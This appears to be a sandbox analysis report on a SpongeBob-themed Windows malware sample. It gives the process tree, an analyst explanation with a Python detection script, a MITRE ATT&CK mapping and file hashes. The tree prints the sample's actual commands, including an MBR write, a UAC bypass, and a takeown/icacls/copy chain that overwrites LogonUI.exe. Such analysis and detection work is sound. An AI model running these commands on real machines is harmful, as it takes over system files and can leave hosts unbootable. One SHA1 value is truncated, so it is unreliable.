C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8476 /prefetch:12⤵PID:6248
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10644 /prefetch:12⤵PID:1360
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10896 /prefetch:12⤵PID:6864
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11004 /prefetch:12⤵PID:6948
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11136 /prefetch:12⤵PID:564
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11328 /prefetch:12⤵PID:6560
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11344 /prefetch:12⤵PID:6640
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11616 /prefetch:12⤵PID:6844
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11940 /prefetch:12⤵PID:6572
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11968 /prefetch:12⤵PID:6872
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11572 /prefetch:12⤵PID:6880
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12136 /prefetch:12⤵PID:6532
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9912 /prefetch:12⤵PID:6060
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12396 /prefetch:12⤵PID:6976
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12528 /prefetch:12⤵PID:7176
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12676 /prefetch:12⤵PID:7184
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12808 /prefetch:12⤵PID:7192
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13132 /prefetch:12⤵PID:7468
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9476 /prefetch:12⤵PID:7936
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10800 /prefetch:12⤵PID:6392
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9188 /prefetch:12⤵PID:6440
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13188 /prefetch:12⤵PID:7580
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:12⤵PID:5548
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9132 /prefetch:12⤵PID:5560
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9340 /prefetch:12⤵PID:6164
-
C:\Windows\System32\CompPkgSrv.exe (level 1, PID 3548)
  command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe (level 1, PID 3588)
  command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\AUDIODG.EXE (level 1, PID 4492)
  command line: C:\Windows\system32\AUDIODG.EXE 0x00000000000004E8 0x00000000000004EC
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\System32\rundll32.exe (level 1, PID 680)
  command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\Temp1_SpongeBobNoSleep2 (HorrorBob5).zip\SpongebobNoSleep2.exe (level 1, PID 1728)
  command line: "C:\Users\Admin\AppData\Local\Temp\Temp1_SpongeBobNoSleep2 (HorrorBob5).zip\SpongebobNoSleep2.exe"
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  C:\Windows\system32\wscript.exe (level 2, PID 3128)
    command line: "C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\6330.tmp\6331.tmp\6332.vbs //Nologo
    C:\Users\Admin\AppData\Local\Temp\6330.tmp\mbr.exe (level 3, PID 4792)
      command line: "C:\Users\Admin\AppData\Local\Temp\6330.tmp\mbr.exe"
      - Executes dropped EXE
      - Writes to the Master Boot Record (MBR)
      - System Location Discovery: System Language Discovery
    C:\Windows\system32\cmd.exe (level 3, PID 3488)
      command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6330.tmp\tools.cmd" "
      - Drops file in Windows directory
      C:\Windows\system32\reg.exe (level 4, PID 2332)
        command line: reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
        - Sets desktop wallpaper using registry
      C:\Windows\system32\rundll32.exe (level 4, 35 instances)
        command line (identical for all 35): RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        PIDs: 3908, 4892, 1140, 704, 3800, 5076, 3512, 1288, 2596, 1620, 1212, 2612, 8, 3164, 4976, 4408, 4848, 3180, 2016, 1312, 2300, 4620, 2948, 2816, 3304, 1732, 3804, 2072, 492, 4560, 3816, 2200, 5064, 4448, 3552
    C:\Users\Admin\AppData\Local\Temp\6330.tmp\MainWindow.exe (level 3, PID 2744)
      command line: "C:\Users\Admin\AppData\Local\Temp\6330.tmp\MainWindow.exe"
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious use of SetWindowsHookEx
    C:\Users\Admin\AppData\Local\Temp\6330.tmp\gdifuncs.exe (level 3, PID 4992)
      command line: "C:\Users\Admin\AppData\Local\Temp\6330.tmp\gdifuncs.exe"
      - Modifies WinLogon for persistence
      - UAC bypass
      - Disables RegEdit via registry modification
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Modifies Control Panel
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - System policy modification
      C:\windows\SysWOW64\takeown.exe (level 4, PID 5392)
        command line: "C:\windows\system32\takeown.exe" /f C:\windows\system32\LogonUI.exe
        - Possible privilege escalation attempt
        - Modifies file permissions
      C:\windows\SysWOW64\icacls.exe (level 4, PID 2876)
        command line: "C:\windows\system32\icacls.exe" C:\\windows\\system32\\LogonUI.exe /granted "Admin":F
        - Possible privilege escalation attempt
        - Modifies file permissions
      C:\Windows\SysWOW64\cmd.exe (level 4, PID 7996)
        command line: "C:\Windows\System32\cmd.exe" /c cd\&cd Windows\system32&takeown /f LogonUI.exe&icacls LogonUI.exe /granted "%username%":F&cd..&cd winbase_base_procid_none&cd secureloc0x65&copy "ui65.exe" "C:\windows\system32\LogonUI.exe" /Y&echo WinLTDRStartwinpos > "c:\windows\WinAttr.gci"&timeout 2&taskkill /f /im "tobi0a0c.exe"&exit
        C:\Windows\SysWOW64\takeown.exe (level 5, PID 1956)
          command line: takeown /f LogonUI.exe
          - Possible privilege escalation attempt
          - Modifies file permissions
        C:\Windows\SysWOW64\icacls.exe (level 5, PID 2276)
          command line: icacls LogonUI.exe /granted "Admin":F
          - Possible privilege escalation attempt
          - Modifies file permissions
        C:\Windows\SysWOW64\timeout.exe (level 5, PID 756)
          command line: timeout 2
          - Delays execution with timeout.exe
        C:\Windows\SysWOW64\taskkill.exe (level 5, PID 4456)
          command line: taskkill /f /im "tobi0a0c.exe"
          - Kills process with taskkill
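The gdifuncs.exe subtree is the part of this tree worth hunting for: a binary dropped under the user's Temp directory takes ownership of C:\windows\system32\LogonUI.exe (takeown /f), grants the current user full control (icacls ... :F; note that the captured switch is /granted rather than the documented /grant, so a detection keyed on the exact string "/grant " would miss it), then a cmd.exe one-liner copies ui65.exe over LogonUI.exe, writes the marker file c:\windows\WinAttr.gci and kills tobi0a0c.exe. Two caveats when verifying a host against this report: cmd.exe, takeown.exe and icacls.exe run here as 32-bit processes (their image paths are under SysWOW64 while their command lines name System32), so WOW64 file-system redirection can send those C:\windows\system32\ paths to C:\Windows\SysWOW64\; check LogonUI.exe in both directories, for example with sfc /scanfile=<path> or by comparing its Authenticode signature with a known-good copy. And the &copy in that one-liner is the cmd copy command after the & separator; renderings of this report that decode it as an HTML entity display it as ©.

The following Python is an added example, not code from this report or from the sample. It replays the chain over process-creation events constructed from the tree above (PIDs as reported, parent links from the nesting; the minimal pid/ppid/image/cmdline event shape and the rule names are this example's own assumptions, not a Sysmon or EDR schema). It resolves the bare LogonUI.exe used by the level-5 children through the parent cmd.exe's cd chain, flags owner/ACL changes on System32 files and copy-overwrites of System32 binaries, and raises severity when any ancestor runs from a user-writable Temp path. Two constructed benign icacls events serve as controls.

```python
# Added example: hunting logic for the LogonUI.exe takeover chain above; not the report's or the sample's code.
import re
from collections import namedtuple

SYSTEM32 = re.compile(r"(?i)\\windows\\system32\\")
USER_WRITABLE = re.compile(r"(?i)\\appdata\\local\\temp\\")
ProcEvent = namedtuple("ProcEvent", "pid ppid image cmdline")  # assumed minimal event shape, not a Sysmon/EDR schema

def norm(path):  # lower-case and collapse doubled backslashes (the report shows both spellings)
    return re.sub(r"\\{2,}", r"\\", path).lower()

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def tokens(cmdline):  # whitespace split that keeps double-quoted arguments whole
    return [q or w for q, w in re.findall(r'"([^"]*)"|(\S+)', cmdline)]

def split_cmd_chain(cmdline):
    """Commands of a 'cmd.exe /c a&b|c' one-liner: split on & or | outside double quotes."""
    m = re.search(r"(?i)\s/c\s+", cmdline)
    parts, cur, in_quote = [], "", False
    for ch in cmdline[m.end():] if m else cmdline:
        in_quote ^= ch == '"'
        if ch in "&|" and not in_quote:
            parts, cur = parts + [cur], ""
        else:
            cur += ch
    return [p.strip() for p in parts + [cur] if p.strip()]

def emulate_cwd(chain, tool):  # directory in effect when `tool` runs in the one-liner (best effort, drive C: assumed)
    cwd = "C:"
    for cmd in chain:
        toks = tokens(cmd)
        if toks and toks[0].lower() == tool:
            break
        cd = re.match(r"(?i)cd(?:\s+|(?=[\\.]))(.*)$", cmd)
        if cd:
            arg = cd.group(1).strip()
            if arg.startswith("\\") or re.match(r"[A-Za-z]:", arg):
                cwd = ("C:" if arg.startswith("\\") else "") + arg.rstrip("\\")
            elif arg == "..":
                cwd = cwd.rsplit("\\", 1)[0]
            else:
                cwd += "\\" + arg
    return cwd

def acl_target(ev):  # file whose owner (takeown /f) or ACL (icacls <file>) the invocation changes
    toks = tokens(ev.cmdline)
    if basename(ev.image) == "icacls.exe":
        return toks[1] if len(toks) > 1 else None
    return next((toks[i + 1] for i, t in enumerate(toks[:-1]) if t.lower() == "/f"), None)

def resolve_target(ev, parent):  # normalised absolute target; a bare name is resolved via the parent cmd.exe's 'cd' chain
    target = acl_target(ev)
    if target and ("\\" in target or ":" in target):
        return norm(target)
    if target and parent and basename(parent.image) == "cmd.exe":
        cwd = emulate_cwd(split_cmd_chain(parent.cmdline), basename(ev.image)[:-4])
        return norm(cwd + "\\" + target)
    return None  # bare name with no cmd.exe context: cannot resolve

def ancestry(ev, by_pid):
    chain, cur = [], by_pid.get(ev.ppid)
    while cur is not None and cur not in chain:
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return chain

def hunt(events):
    """Flag owner/ACL changes on System32 files and copy-overwrites of System32 binaries;
    severity is 'high' when an ancestor runs from a user-writable Temp path."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        name, hits = basename(ev.image), []
        if name in ("takeown.exe", "icacls.exe"):
            target = resolve_target(ev, by_pid.get(ev.ppid))
            if target and SYSTEM32.search(target):
                hits.append(("acl_tamper_system32", target))
        for seg in split_cmd_chain(ev.cmdline) if name == "cmd.exe" else []:
            toks = tokens(seg)
            args = [norm(t) for t in toks[1:] if not t.startswith("/")]
            if toks and toks[0].lower() == "copy" and len(args) > 1 and SYSTEM32.search(args[-1]):
                hits.append(("overwrite_system32_binary", args[-1]))
        severity = "high" if any(USER_WRITABLE.search(a.image) for a in ancestry(ev, by_pid)) else "medium"
        findings += [{"rule": r, "pid": ev.pid, "target": t, "severity": severity} for r, t in hits]
    return findings

T = r"C:\Users\Admin\AppData\Local\Temp\6330.tmp"
EVENTS = [  # constructed from the tree above (PIDs as reported); the last two rows are benign controls
    ProcEvent(4992, 0, rf"{T}\gdifuncs.exe", rf'"{T}\gdifuncs.exe"'),
    ProcEvent(5392, 4992, r"C:\windows\SysWOW64\takeown.exe", r'"C:\windows\system32\takeown.exe" /f C:\windows\system32\LogonUI.exe'),
    ProcEvent(2876, 4992, r"C:\windows\SysWOW64\icacls.exe", r'"C:\windows\system32\icacls.exe" C:\\windows\\system32\\LogonUI.exe /granted "Admin":F'),
    ProcEvent(7996, 4992, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c cd\&cd Windows\system32&takeown /f LogonUI.exe&icacls LogonUI.exe /granted "%username%":F&cd..&cd winbase_base_procid_none&cd secureloc0x65&copy "ui65.exe" "C:\windows\system32\LogonUI.exe" /Y&echo WinLTDRStartwinpos > "c:\windows\WinAttr.gci"&timeout 2&taskkill /f /im "tobi0a0c.exe"&exit'),
    ProcEvent(1956, 7996, r"C:\Windows\SysWOW64\takeown.exe", "takeown /f LogonUI.exe"),
    ProcEvent(9100, 0, r"C:\Windows\System32\icacls.exe", r"icacls C:\Windows\System32\drivers\etc\hosts /grant Admin:F"),
    ProcEvent(9001, 0, r"C:\Windows\System32\icacls.exe", r"icacls C:\Users\Admin\Documents\report.docx /grant Admin:F"),
]
```

Run hunt(EVENTS): the four events that touch LogonUI.exe (PIDs 5392, 2876, 7996, 1956) come back as high-severity findings because gdifuncs.exe, their common ancestor, runs from Temp, while the constructed icacls on drivers\etc\hosts is reported at medium severity and the one on a Documents file is not reported at all. The cwd emulation only follows cd commands on one drive and stops at the first command whose first token is the tool's name; for a one-liner that runs the same tool twice with different working directories, key the stop on the full child command line instead.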
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 1, PID 1168)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2, PID 3192)
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff88aa53cb8,0x7ff88aa53cc8,0x7ff88aa53cd8
C:\Windows\system32\BackgroundTransferHost.exe (level 1, PID 7460)
  command line: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
  - Modifies registry class
C:\Windows\system32\svchost.exe (level 1, PID 7284)
  command line: C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
C:\Windows\System32\oobe\UserOOBEBroker.exe (level 1, PID 5240)
  command line: C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe (level 1, PID 5756)
  command line: C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
C:\Windows\System32\rundll32.exe (level 1, PID 7712)
  command line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding
Network
MITRE ATT&CK Enterprise v15 (the number after each technique is the count of matching signatures)
Persistence
  Boot or Logon Autostart Execution (T1547): 1
    Winlogon Helper DLL (T1547.004): 1
  Pre-OS Boot (T1542): 1
    Bootkit (T1542.003): 1
Privilege Escalation
  Abuse Elevation Control Mechanism (T1548): 1
    Bypass User Account Control (T1548.002): 1
  Boot or Logon Autostart Execution (T1547): 1
    Winlogon Helper DLL (T1547.004): 1
Defense Evasion
  Abuse Elevation Control Mechanism (T1548): 1
    Bypass User Account Control (T1548.002): 1
  File and Directory Permissions Modification (T1222): 1
  Impair Defenses (T1562): 1
    Disable or Modify Tools (T1562.001): 1
  Modify Registry (T1112): 4
  Pre-OS Boot (T1542): 1
    Bootkit (T1542.003): 1
Downloads
-
  Filesize: 152B
  MD5: 5431d6602455a6db6e087223dd47f600
  SHA1: 27255756d0afe4f1185e7708a3d07dea6e
  SHA256: 7502d9453168c86631fb40ec90567bf80404615d387afc7ec2beb7a075bcc763
  SHA512: 868f6dcf32ef80459f3ea122b0d2c79191193b5885c86934a97bfec7e64250e10c23e4d00f34c6c2387a04a15f3f266af96e571bbe37077fb374d6d30f35b829
-
  Filesize: 152B
  MD5: 7bed1eca5620a49f52232fd55246d09a
  SHA1: e429d9d401099a1917a6fb31ab2cf65fcee22030
  SHA256: 49c484f08c5e22ee6bec6d23681b26b0426ee37b54020f823a2908ab7d0d805e
  SHA512: afc8f0b5b95d593f863ad32186d1af4ca333710bcfba86416800e79528616e7b15f8813a20c2cfa9d13688c151bf8c85db454a9eb5c956d6e49db84b4b222ee8
-
  C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\6c05458b-3b30-4166-9e03-b5da4459b93e.tmp
  Filesize: 6KB
  MD5: 72a8ab06a9c0e8a5c57ce7a22929a27a
  SHA1: 18328e03dcc990672a9f9ff2277631e729b60414
  SHA256: ce0f12b7d353e8269a6727f9c533df80621f0b545533d210664042a3c10cb6a2
  SHA512: 68904d09dfb77a1dbd2efe07c983a3b8479cdfc130e7faaa1780af9f12d976a0fbc254d5fdcb3ef157091405a8284713e76d87f53cc5e3b83b560fa7c1446889
-
  Filesize: 20KB
  MD5: 07c1b97de5c54707533eab8d854e8f6d
  SHA1: c7c17005580c6ffa276c9fee6015406364169f0c
  SHA256: c290fd85b8d55d003ce348e1ad178d37d1744293f42981d093ffc44c2e0cb517
  SHA512: 3b470051fa2d6745b7b7df855e2acb169e85ae6dbad91a002530d8194b27ffd06f5916b00ae20c7863ba88588eb70ebb2c31e2a34b86bd0206177df301feded2
-
  Filesize: 37KB
  MD5: c67ee59476ed03e32d0aeb3abd3b1d95
  SHA1: 8b66a81cd4c7100c925e2b70d29b3fdbd50f8d9b
  SHA256: 2d35ec95c10e30f0bddbfb37173697d6f23cd343398c85a9442c8d946d0660e3
  SHA512: 421d50524bd743d746071aaad698616e727271fdf21ee28517763a429dcb6839a7ad77f7575b13c6294dc64d255df9b0a64eb09c9d3b2349fef49b883899d931
-
  Filesize: 37KB
  MD5: ceeb814bab0da3562b33344de8e5a372
  SHA1: b5eed9180832cf5765cd58857118ea553932bf29
  SHA256: 14d39e6c38691ddb59951108df87b186e5933010426c72c1ee82166cdad0169a
  SHA512: fd3f90e2fd92eca692559a41868290aa9bbc5504222d20722cc505ad3e4c2a154dc5bf8cc637eee2d25f8be2c967bbb9012a93cd4fd7e6a00433fcc934f0ee1b
-
  Filesize: 22KB
  MD5: ce98c3b639ff53e62db72824806a2f32
  SHA1: 4ebdf1ac5041a2bbfc736eee17784a24a7b2fdef
  SHA256: 84a942b9db6aba18b48f01a3e866b3ebb2b064655dc61969fa0f4d5e70194844
  SHA512: 078c00acf0ec32dcd849d9f65405d3be8b7cffd8b42acffbf7fe6c6ffaf7c75be299cb10bece3768606db21765d2296cfcce334ad94a12b9a46bd65720e7c696
-
  Filesize: 18KB
  MD5: 2e23d6e099f830cf0b14356b3c3443ce
  SHA1: 027db4ff48118566db039d6b5f574a8ac73002bc
  SHA256: 7238196a5bf79e1b83cacb9ed4a82bf40b32cd789c30ef790e4eac0bbf438885
  SHA512: 165b1de091bfe0dd9deff0f8a3968268113d95edc9fd7a8081b525e0910f4442cfb3b4f5ac58ecfa41991d9dcabe5aa8b69f7f1c77e202cd17dd774931662717
-
  Filesize: 59KB
  MD5: bd946ba0bf15acbe12f52f126ad40dc6
  SHA1: dc1bc60049a379d475857867455e91276e18d835
  SHA256: 279f3edf35641367a0a2c89fb3fb58d2bbb0f51b18116197c4f3b91196b5a8ba
  SHA512: de491d6e54da1070f2e50390a672cd85c8fafd2f93d76880bebaf64832face6c6baeb28fd215057854cd736e97581373a9913e64227c4d79403c4c69a475b932
-
  Filesize: 38KB
  MD5: 0b1cb53525eea7989fc36cbacf716980
  SHA1: 233f374a68a3b2837780a131f2d3373ee0697c17
  SHA256: 825e558ea0411a6f745aef7a50996961bfcd7f08e07eb7b2da6a56758dda1332
  SHA512: 7da444f8ea3825c173583c3db3313b0ddab86eca470b4129924a786a706357fdf67ca766979b998b33ce9b30ef802ae5219aef1c45296b532e14ee0f1d97032e
-
  Filesize: 18KB
  MD5: f4a9a0abf7ed940419adeaabba6b37c0
  SHA1: 01cc6457224deec29303633b3dd8cacbac184aa5
  SHA256: 8b4dae3ac3068eb8c85e6f93c6eb3660ff9f5e867abf171fe44a8407d2fd5871
  SHA512: f2d3689d9eb7d9cefd0db065fac8413e261d3d480a7ce9dc4ba53325ffcb1128ab966cc80a3daa27ad2e997d1dbd9785da7ad81857854022948da883ab19c708
-
  Filesize: 53KB
  MD5: cfff8fc00d16fc868cf319409948c243
  SHA1: b7e2e2a6656c77a19d9819a7d782a981d9e16d44
  SHA256: 51266cbe2741a46507d1bb758669d6de3c2246f650829774f7433bc734688a5a
